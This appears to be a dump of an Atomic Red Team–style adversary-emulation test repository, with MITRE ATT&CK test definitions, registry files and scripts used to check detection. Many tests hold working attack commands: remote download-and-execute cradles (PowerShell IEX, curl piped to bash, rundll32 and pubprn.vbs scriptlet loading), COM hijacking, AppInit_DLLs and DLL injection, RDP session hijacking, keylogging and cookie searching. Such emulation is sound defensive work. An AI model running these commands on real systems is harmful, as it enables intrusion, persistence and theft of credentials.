└── tests
├── T1060
├── HelloWorld.bat
├── t1060.ps1
└── T1060.yaml
├── T1179
├── bin
│ ├── T1179x64.dll
│ └── T1179x86.dll
├── src
│ ├── x64
│ │ └── T1179.dll
│ ├── Win32
│ │ └── T1179.dll
│ ├── T1179
│ │ ├── T1179.vcxproj.user
│ │ └── T1179.vcxproj.filters
│ └── T1179.sln
└── T1179.todo
├── T1055
└── src
│ └── x64
│ └── T1055.dll
├── T1059
├── echo-art-fish.sh
└── T1059.yaml
├── T1138
├── src
│ ├── AtomicShim.zip
│ ├── AtomicTest.dll
│ ├── AtomicShimx86.sdb
│ ├── AtomicTest.dll.cpp
│ ├── AtomicTest.cs
│ └── README.md
└── T1138.todo
├── T1154
├── echo-art-fish.sh
├── T1154.todo
└── T1154.md
├── T1050
├── bin
│ └── AtomicService.exe
├── src
│ └── AtomicService.cs
└── T1050.yaml
├── T1117
├── bin
│ └── AllTheThingsx86.dll
├── RegSvr32.sct
└── T1117.todo
├── T1122
├── src
│ ├── test.bat
│ ├── COMHijackCleanup.reg
│ ├── AtomicRedTeam.sct
│ └── COMHijack.reg
└── T1122.todo
├── T1193
├── PhishingAttachment.xlsm
└── T1193.yaml
├── T1086
└── payloads
│ ├── test.ps1
│ ├── test.xml
│ ├── test.xsl
│ ├── test.sct
│ └── mshta.sct
├── T1127
└── src
│ ├── msxsl-xmlfile.xml
│ ├── msxsl-script.xsl
│ └── T1127.csproj
├── T1166
├── hello.c
└── T1166.todo
├── T1103
├── T1103.reg
└── T1103.todo
├── T1176
├── manifest.json
├── T1176.todo
└── inline.js
├── T1152
├── T1152.todo
└── T1152.md
├── T1169
├── T1169.todo
└── T1169.md
├── T1170
├── T1170.sct
└── T1170.yaml
├── T1191
├── T1191.inf
├── T1191_uacbypass.inf
├── T1191.sct
└── T1191.todo
├── T1163
├── T1163.todo
└── T1163.md
├── T1074
├── T1074.todo
├── T1074.md
└── Discovery.bat
├── T1128
└── T1128.todo
├── T1139
├── T1139.yaml
└── T1139.md
├── T1118
├── T1118.todo
└── src
│ └── T1118.cs
├── T1005
├── T1005.todo
└── T1005.md
├── T1076
└── T1076.todo
├── T1085
├── T1085.todo
└── T1085.sct
├── T1042
└── T1042.todo
├── T1115
├── T1115.todo
├── T1115.yaml
└── T1115.md
├── T1056
└── T1056.todo
├── T1007
├── T1007.yaml
└── T1007.md
├── T1216
├── T1216.todo
└── payloads
│ └── T1216.sct
├── T1030
├── T1030.yaml
└── T1030.md
├── T1214
├── T1214.yaml
└── T1214.md
├── T1134
└── T1134.todo
├── T1057
└── T1057.yaml
├── T1147
├── T1147.yaml
└── T1147.md
├── T1088
└── T1088.todo
├── T1090
├── T1090.todo
└── T1090.md
├── T1010
├── T1010.todo
└── T1010.md
├── T1114
├── T1114.todo
├── T1114.md
└── Get-Inbox.ps1
├── T1144
└── T1144.yaml
├── T1153
└── T1153.todo
├── T1027
└── T1027.yaml
├── T1009
├── T1009.yaml
└── T1009.md
├── T1046
└── T1046.yaml
├── T1069
└── T1069.yaml
├── T1082
└── T1082.yaml
├── T1160
└── T1160.todo
├── T1135
└── T1135.yaml
├── T1151
├── T1151.yaml
└── T1151.md
├── T1207
└── T1207.todo
├── T1119
└── T1119.yaml
├── T1036
└── T1036.yaml
├── T1049
└── T1049.yaml
├── T1217
└── T1217.todo
├── T1206
└── T1206.todo
├── T1016
└── T1016.yaml
├── T1156
└── T1156.yaml
├── T1047
└── T1047.yaml
├── T1124
└── T1124.yaml
├── T1018
└── T1018.yaml
├── T1053
└── T1053.yaml
├── T1098
└── T1098.todo
├── T1062
├── T1062.todo
└── T1062.md
├── T1223
└── T1223.todo
├── T1064
├── T1064.yaml
└── T1064.md
├── T1174
└── T1174.todo
├── T1123
└── T1123.todo
├── T1113
└── T1113.yaml
├── T1031
└── T1031.yaml
├── T1148
└── T1148.yaml
├── T1070
├── T1070.yaml
└── T1070.md
├── T1141
├── T1141.yaml
└── T1141.md
├── T1132
├── T1132.yaml
└── T1132.md
├── T1022
└── T1022.yaml
├── T1101
├── T1101.todo
└── T1101.md
├── T1142
├── T1142.yaml
└── T1142.md
├── T1146
└── T1146.yaml
├── T1180
└── T1180.todo
├── T1150
└── T1150.yaml
├── T1165
├── T1165.todo
└── T1165_emond.plist
├── T1164
└── T1164.todo
├── T1159
└── T1159.todo
├── T1140
└── T1140.todo
├── T1065
└── T1065.todo
├── T1075
└── T1075.todo
├── T1130
└── T1130.todo
├── T1201
└── T1201.todo
├── T1081
└── T1081.todo
├── T1035
├── T1035.yaml
└── T1035.md
├── T1197
└── T1197.yaml
├── T1002
├── T1002.yaml
└── T1002.todo
├── T1110
└── T1110.todo
├── T1126
└── T1126.todo
├── T1145
├── T1145.todo
└── T1145.md
├── T1096
└── T1096.todo
├── T1077
└── T1077.todo
├── T1063
└── T1063.yaml
├── T1087
└── T1087.yaml
├── T1183
└── T1183.todo
├── T1033
└── T1033.yaml
├── T1137
└── T1137.yaml
├── T1099
└── T1099.todo
├── T1155
└── T1155.todo
├── T1105
└── T1105.todo
├── T1202
└── T1202.todo
├── T1218
└── T1218.todo
├── T1048
└── T1048.yaml
├── T1014
└── T1014.todo
├── T1004
└── T1004.todo
└── T1037
├── T1037.todo
└── T1037.yaml
/tests/T1060/HelloWorld.bat:
--------------------------------------------------------------------------------
1 | echo "Hello World"
2 |
--------------------------------------------------------------------------------
/tests/T1179/bin/T1179x64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/bin/T1179x64.dll
--------------------------------------------------------------------------------
/tests/T1179/bin/T1179x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/bin/T1179x86.dll
--------------------------------------------------------------------------------
/tests/T1055/src/x64/T1055.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1055/src/x64/T1055.dll
--------------------------------------------------------------------------------
/tests/T1059/echo-art-fish.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | echo So long, and thanks for all the fish! > /tmp/art-fish.txt
--------------------------------------------------------------------------------
/tests/T1138/src/AtomicShim.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1138/src/AtomicShim.zip
--------------------------------------------------------------------------------
/tests/T1138/src/AtomicTest.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1138/src/AtomicTest.dll
--------------------------------------------------------------------------------
/tests/T1154/echo-art-fish.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | echo So long, and thanks for all the fish! > /tmp/art-fish.txt
--------------------------------------------------------------------------------
/tests/T1179/src/x64/T1179.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/src/x64/T1179.dll
--------------------------------------------------------------------------------
/tests/T1050/bin/AtomicService.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1050/bin/AtomicService.exe
--------------------------------------------------------------------------------
/tests/T1138/src/AtomicShimx86.sdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1138/src/AtomicShimx86.sdb
--------------------------------------------------------------------------------
/tests/T1179/src/Win32/T1179.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1179/src/Win32/T1179.dll
--------------------------------------------------------------------------------
/tests/T1117/bin/AllTheThingsx86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1117/bin/AllTheThingsx86.dll
--------------------------------------------------------------------------------
/tests/T1122/src/test.bat:
--------------------------------------------------------------------------------
1 | reg import COMHijack.reg
2 | certutil.exe -CAInfo
3 | reg import COMHijackCleanup.reg
4 |
--------------------------------------------------------------------------------
/tests/T1193/PhishingAttachment.xlsm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fugawi/mate/HEAD/tests/T1193/PhishingAttachment.xlsm
--------------------------------------------------------------------------------
/tests/T1086/payloads/test.ps1:
--------------------------------------------------------------------------------
1 | # Test download cradle
2 | write-host -ForegroundColor Cyan "$(Get-Date -Format s) Download Cradle test success!`n"
3 |
--------------------------------------------------------------------------------
/tests/T1127/src/msxsl-xmlfile.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | AtomicRedTeam
6 |
7 |
--------------------------------------------------------------------------------
/tests/T1166/hello.c:
--------------------------------------------------------------------------------
1 | #import
2 | #import
3 | int main()
4 | {
5 | printf("Hello\n");
6 | sleep(60);
7 | printf("Don't run random binaries!\n");
8 | return 0;
9 | }
10 |
--------------------------------------------------------------------------------
/tests/T1179/src/T1179/T1179.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/tests/T1086/payloads/test.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | write-host -ForegroundColor Cyan "$(Get-Date -Format s) Download Cradle test success!`n"
5 |
6 |
7 |
--------------------------------------------------------------------------------
/tests/T1103/T1103.reg:
--------------------------------------------------------------------------------
1 | Windows Registry Editor Version 5.00
2 |
3 | [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
4 | "AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll"
5 | "LoadAppInit_DLLs"=dword:00000001
6 | "RequireSignedAppInit_DLLs"=dword:00000000
7 |
--------------------------------------------------------------------------------
/tests/T1122/src/COMHijackCleanup.reg:
--------------------------------------------------------------------------------
1 | Windows Registry Editor Version 5.00
2 | [-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
3 | [-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
4 | [-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
5 | [-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
6 |
--------------------------------------------------------------------------------
/tests/T1176/manifest.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Minimum Viable Malicious Extension",
3 | "description": "Base Level Extension",
4 | "version": "1.0",
5 | "manifest_version": 2,
6 | "content_scripts": [
7 | {
8 | "matches": [
9 | ""
10 | ],
11 | "js": [
12 | "inline.js"
13 | ]
14 | }
15 | ]
16 | }
--------------------------------------------------------------------------------
/tests/T1152/T1152.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1152
3 | display_name: Launchctl
4 |
5 | atomic_tests:
6 | - name: Launchctl
7 | description: |
8 | Utilize launchctl
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: sh
15 | command: |
16 | launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
17 |
--------------------------------------------------------------------------------
/tests/T1060/t1060.ps1:
--------------------------------------------------------------------------------
1 | $TargetFile = "\mate\tests\t1060\HelloWorld.bat"
2 | $ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
3 | $WScriptShell = New-Object -ComObject WScript.Shell
4 | $Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
5 | $Shortcut.TargetPath = $TargetFile
6 | $Shortcut.Save()
7 |
8 | Remove-Item -Path $ShortcutFile -Force
--------------------------------------------------------------------------------
/tests/T1138/T1138.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1138
3 | display_name: Application Shimming
4 |
5 | atomic_tests:
6 | - name: Application Shim Installation
7 | description: |
8 | This test injects a DLL into a custom application
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | executor:
14 | name: command_prompt
15 | command: |
16 | sdbinst.exe AtomicShimx86.sdb
17 |
--------------------------------------------------------------------------------
/tests/T1169/T1169.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1169
3 | display_name: SUDO
4 |
5 | atomic_tests:
6 | - name: Sudo usage
7 | description: |
8 | Common Sudo enumeration methods.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sudo -l
18 | sudo su
19 | cat /etc/sudoers
20 | vim /etc/sudoers
21 |
--------------------------------------------------------------------------------
/tests/T1122/T1122.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1122
3 | display_name: Component Object Model Hijacking
4 |
5 | atomic_tests:
6 | - name: Component Object Model Hijacking
7 | description: |
8 | Hijack COM Object used by certutil.exe
9 |
10 | supported_platforms:
11 | - windows
12 | executor:
13 | name: command_prompt
14 | command: |
15 | reg import ..\src\COMHijack.reg
16 | certutil.exe -CAInfo
17 | reg import ..\src\COMHijackCleanup.reg
18 |
--------------------------------------------------------------------------------
/tests/T1170/T1170.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
11 |
12 |
17 |
18 |
19 |
20 |
--------------------------------------------------------------------------------
/tests/T1122/src/AtomicRedTeam.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
11 |
12 |
13 |
21 |
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/tests/T1191/T1191.inf:
--------------------------------------------------------------------------------
1 | ; Author: @NickTyrer - https://twitter.com/NickTyrer/status/958450014111633408
2 |
3 | [version]
4 | Signature=$chicago$
5 | AdvancedINF=2.5
6 |
7 | [DefaultInstall_SingleUser]
8 | UnRegisterOCXs=UnRegisterOCXSection
9 |
10 | [UnRegisterOCXSection]
11 | %11%\scrobj.dll,NI,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1191/T1191.sct
12 |
13 | [Strings]
14 | AppAct = "SOFTWARE\Microsoft\Connection Manager"
15 | ServiceName="Yay"
16 | ShortSvcName="Yay"
17 |
--------------------------------------------------------------------------------
/tests/T1138/src/AtomicTest.dll.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 | #include
4 |
5 | BOOL APIENTRY DllMain(HMODULE hModule,
6 | DWORD ul_reason_for_call,
7 | LPVOID lpReserved
8 | )
9 | {
10 | switch (ul_reason_for_call)
11 | {
12 | case DLL_PROCESS_ATTACH:
13 | MessageBox(0, L"Atomic Shim DLL Test!", 0, 0);
14 | case DLL_THREAD_ATTACH:
15 | case DLL_THREAD_DETACH:
16 | case DLL_PROCESS_DETACH:
17 | break;
18 | }
19 | return TRUE;
20 | }
21 |
--------------------------------------------------------------------------------
/tests/T1163/T1163.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1163
3 | display_name: rc.common
4 |
5 | atomic_tests:
6 | - name: rc.common
7 | description: |
8 | Modify rc.common
9 |
10 | [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | executor:
16 | name: sh
17 | command: |
18 | echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
19 |
--------------------------------------------------------------------------------
/tests/T1074/T1074.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1074
3 | display_name: Data Staged
4 |
5 | atomic_tests:
6 | - name: Stage data from Discovery.bat
7 | description: |
8 | Utilize powershell to download discovery.bat and save to a local file
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | executor:
14 | name: powershell
15 | command: |
16 | "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
17 |
--------------------------------------------------------------------------------
/tests/T1086/payloads/test.xsl:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
8 |
11 |
12 |
--------------------------------------------------------------------------------
/tests/T1086/payloads/test.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
6 |
7 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/tests/T1127/src/msxsl-script.xsl:
--------------------------------------------------------------------------------
1 |
2 |
6 |
7 |
8 | function xml(nodelist) {
9 | var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
10 | return nodelist.nextNode().xml;
11 |
12 | }
13 |
14 |
15 |
16 |
17 |
--------------------------------------------------------------------------------
/tests/T1128/T1128.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1128
3 | display_name: Netsh Helper DLL
4 |
5 | atomic_tests:
6 | - name: Netsh Helper DLL Registration
7 | description: |
8 | Netsh interacts with other operating system components using dynamic-link library (DLL) files
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | helper_file:
15 | description: Path to DLL
16 | type: Path
17 | default: C:\Path\file.dll
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | netsh.exe add helper #{helper_file}
23 |
--------------------------------------------------------------------------------
/tests/T1138/src/AtomicTest.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | /*
4 | mkdir C:\Tools
5 | copy AtomicTest.Dll C:\Tools\AtomicTest.dll
6 |
7 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /platform:x86 AtomicTest.cs
8 | From Elevated Prompt
9 |
10 | sdbinst.exe AtomicShimx86.sdb
11 | AtomicTest.exe
12 | sdbinst -u AtomicShimx86.sdb
13 |
14 | */
15 |
16 |
17 | public class AtomicTest
18 | {
19 | public static void Main()
20 | {
21 | Console.WriteLine("Boom!");
22 | }
23 |
24 | public static bool Thing()
25 | {
26 | Console.WriteLine("Things!");
27 | return true;
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/tests/T1103/T1103.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1103
3 | display_name: AppInit DLLs
4 |
5 | atomic_tests:
6 | - name: Install AppInit Shim
7 | description: |
8 | AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | registry_file:
15 | description: Windows Registry File
16 | type: Path
17 | default: T1103.reg
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | reg.exe import #{registry_file}
23 |
--------------------------------------------------------------------------------
/tests/T1139/T1139.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1139
3 | display_name: Bash History
4 | tactic: Credential Access
5 | description: Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file.
6 |
7 | atomic_tests:
8 | - name: Enumerate bash history
9 | description: |
10 | Bash history
11 |
12 | supported_platforms:
13 | - linux
14 | - macos
15 |
16 | executor_nix:
17 | name: sh
18 | command: |
19 | cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
20 |
--------------------------------------------------------------------------------
/tests/T1166/T1166.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1166
3 | display_name: Setuid and Setgid
4 |
5 | atomic_tests:
6 | - name: Setuid and Setgid
7 | description: |
8 | Setuid and Setgid
9 |
10 | supported_platforms:
11 | - macos
12 | - centos
13 | - ubuntu
14 | - linux
15 |
16 | input_arguments:
17 | payload:
18 | description: hello.c payload
19 | type: path
20 | default: hello.c
21 |
22 | executor:
23 | name: manual
24 | steps: |
25 | 1. make hello
26 |
27 | 2. sudo chown root hello
28 |
29 | 3. sudo chmod u+s hello
30 |
31 | 4. ./hello
32 |
--------------------------------------------------------------------------------
/tests/T1118/T1118.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1118
3 | display_name: InstallUtil
4 |
5 | atomic_tests:
6 | - name: InstallUtil uninstall method call
7 | description: |
8 | Executes the Uninstall Method
9 | supported_platforms:
10 | - windows
11 | input_arguments:
12 | filename:
13 | description: location of the payload
14 | type: Path
15 | default: T1118.dll
16 | executor:
17 | name: command_prompt
18 | command: |
19 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
20 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}
21 |
--------------------------------------------------------------------------------
/tests/T1138/src/README.md:
--------------------------------------------------------------------------------
1 | ## Application Compatibility Shims
2 |
3 | [Reference](https://blogs.technet.microsoft.com/askperf/2011/06/17/demystifying-shims-or-using-the-app-compat-toolkit-to-make-your-old-stuff-work-with-your-new-stuff/)
4 |
5 | [Additional References:](https://sdb.tools/resources.html)
6 |
7 | All Files Contained in .Zip.
8 |
9 | Otherwise you can roll your own.
10 |
11 | ##### This Shim Injects a DLL named AtomicTest.DLL from C:\Tools into an Application named AtomicTest.exe
12 | ##### Specifically with an Original_FileName and Internal_Name of AtomicTest.exe
13 | ##### Easiest way to create that is to compile and use the C# Sample AtomicTest.cs
14 |
--------------------------------------------------------------------------------
/tests/T1005/T1005.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1005
3 | display_name: Data from Local System
4 |
5 | atomic_tests:
6 | - name: Search macOS Safari Cookies
7 | description: |
8 | This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | input_arguments:
14 | search_string:
15 | description: String to search Safari cookies to find.
16 | type: string
17 | default: coinbase
18 |
19 | executor:
20 | name: sh
21 | command: |
22 | cd ~/Library/Cookies
23 | grep -q "#{search_string}" "Cookies.binarycookies"
--------------------------------------------------------------------------------
/tests/T1076/T1076.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1076
3 | display_name: Remote Desktop Protocol
4 |
5 | atomic_tests:
6 | - name: RDP
7 | description: |
8 | RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
9 |
10 |
11 | supported_platforms:
12 | - windows
13 |
14 | executor:
15 | name: command_prompt
16 | command: |
17 | query user
18 | sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
19 | net start sesshijack
20 | sc.exe delete sesshijack
21 |
--------------------------------------------------------------------------------
/tests/T1085/T1085.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1085
3 | display_name: Rundll32
4 | atomic_tests:
5 | - name: Rundll32 execute JavaScript Remote Payload With GetObject
6 | description: |
7 | Test execution of a remote script using rundll32.exe
8 | supported_platforms:
9 | - windows
10 | input_arguments:
11 | file_url:
12 | description: location of the payload
13 | type: Url
14 | default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct
15 | executor:
16 | name: command_prompt
17 | command: |
18 | rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
19 |
--------------------------------------------------------------------------------
/tests/T1179/T1179.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1179
3 | display_name: Hooking
4 |
5 | atomic_tests:
6 | - name: Hook PowerShell TLS Encrypt/Decrypt Messages
7 | description: |
8 | Hooks functions in PowerShell to read TLS Communications
9 | supported_platforms:
10 | - windows
11 | input_arguments:
12 | file_name:
13 | description: Dll To Inject
14 | type: Path
15 | default: C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll
16 | server_name:
17 | description: TLS Server To Test Get Request
18 | type: Url
19 | default: https://www.example.com
20 | executor:
21 | name: powershell
22 | command: |
23 | mavinject $pid /INJECTRUNNING #{file_name}
24 | curl #{server_name}
25 |
--------------------------------------------------------------------------------
/tests/T1042/T1042.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1042
3 | display_name: Change Default File Association
4 |
5 | atomic_tests:
6 | - name: Change Default File Association
7 | description: |
8 | Change Default File Association From cmd.exe
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | extension_to_change:
14 | description: File Extension To Hijack
15 | type: String
16 | default: .wav
17 | target_exenstion_handler:
18 | description: Thing To Open
19 | type: Path
20 | default: C:\Program Files\Windows Media Player\wmplayer.exe
21 | executor:
22 | name: command_prompt
23 | command: |
24 | cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
25 |
--------------------------------------------------------------------------------
/tests/T1154/T1154.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1154
3 | display_name: Trap
4 |
5 | atomic_tests:
6 | - name: Trap
7 | description: |
8 | After exiting the shell, the script will download and execute.
9 |
10 | After sending a keyboard interrupt (CTRL+C) the script will download and execute.
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor:
19 | name: sh
20 | command: |
21 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
22 | exit
23 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
24 |
--------------------------------------------------------------------------------
/tests/T1115/T1115.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1115
3 | display_name: Clipboard Data
4 | attack_link: https://attack.mitre.org/wiki/Technique/T1115
5 |
6 | atomic_tests:
7 | - name: Utilize Clipboard to store or execute commands from
8 | description: |
9 | Add data to clipboard to copy off or execute commands from.
10 | supported_platforms:
11 | - windows
12 | executor:
13 | name: command_prompt
14 | command: |
15 | dir | clip
16 | clip < readme.txt
17 |
18 | - name: PowerShell
19 | description: |
20 | Utilize PowerShell to echo a command to clipboard and execute it
21 | supported_platforms:
22 | - windows
23 | executor:
24 | name: powershell
25 | command: |
26 | echo Get-Process | clip
27 | Get-Clipboard | iex
28 |
--------------------------------------------------------------------------------
/tests/T1056/T1056.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1056
3 | display_name: Input Capture
4 |
5 | atomic_tests:
6 | - name: Input Capture
7 | description: |
8 | Utilize PowerShell and external resource to capture keystrokes
9 | [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/Get-Keystrokes.ps1)
10 | Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | filepath:
17 | description: Name of the local file, include path.
18 | type: Path
19 | default: c:\key.log
20 |
21 | executor:
22 | name: powershell
23 | command: |
24 | .\Get-Keystrokes.ps1 -LogPath #{filepath}
25 |
--------------------------------------------------------------------------------
/tests/T1007/T1007.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1007
3 | display_name: System Service Discovery
4 | tactic: Discovery
5 | description: Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net.
6 |
7 | atomic_tests:
8 | - name: Enumerate system services
9 | description: |
10 | Identify system services cmd
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor_cmd:
16 | name: command_prompt
17 | command: |
18 | tasklist.exe /v
19 | sc query
20 | sc query state= all
21 | sc start bthserv
22 | sc stop bthserv
23 | wmic service where displayname="Carbon Black Sensor" get name
--------------------------------------------------------------------------------
/tests/T1216/T1216.todo:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1216
3 | display_name: Signed Script Proxy Execution
4 |
5 | atomic_tests:
6 | - name: PubPrn.vbs Signed Script Bypass
7 | description: |
8 | Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | remote_payload:
15 | description: A remote payload to execute using PubPrn.vbs.
16 | type: Url
17 | default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"
23 |
--------------------------------------------------------------------------------
/tests/T1030/T1030.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1030
3 | display_name: Data Transfer Size Limits
4 | tactic: Exfiltration
5 | description: An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
6 |
7 | atomic_tests:
8 | - name: Data transfer size set to 5Mb
9 | description: |
10 | Take a file/directory, split it into 5Mb chunks
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor_nix:
19 | name: sh
20 | command: |
21 | cd /tmp/
22 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
23 | split -b 5000000 /tmp/victim-whole-file
24 | ls -l
25 |
--------------------------------------------------------------------------------
/tests/T1115/T1115.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1115
3 | display_name: Clipboard Data
4 | tactic: Collection
5 | description: Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
6 |
7 | atomic_tests:
8 | - name: Utilize Clipboard to store or execute commands
9 | description: |
10 | Add data to clipboard to copy off or execute commands from.
11 | Utilize PowerShell to echo a command to clipboard and execute it
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor_man:
17 | name: command_prompt
18 | command: |
19 | dir | clip
20 | clip < readme.txt
21 |
22 | executor_pwr:
23 | name: powershell
24 | command: |
25 | echo Get-Process | clip
26 | Get-Clipboard | iex
27 |
--------------------------------------------------------------------------------
/tests/T1191/T1191_uacbypass.inf:
--------------------------------------------------------------------------------
1 | [version]
2 | Signature=$chicago$
3 | AdvancedINF=2.5
4 |
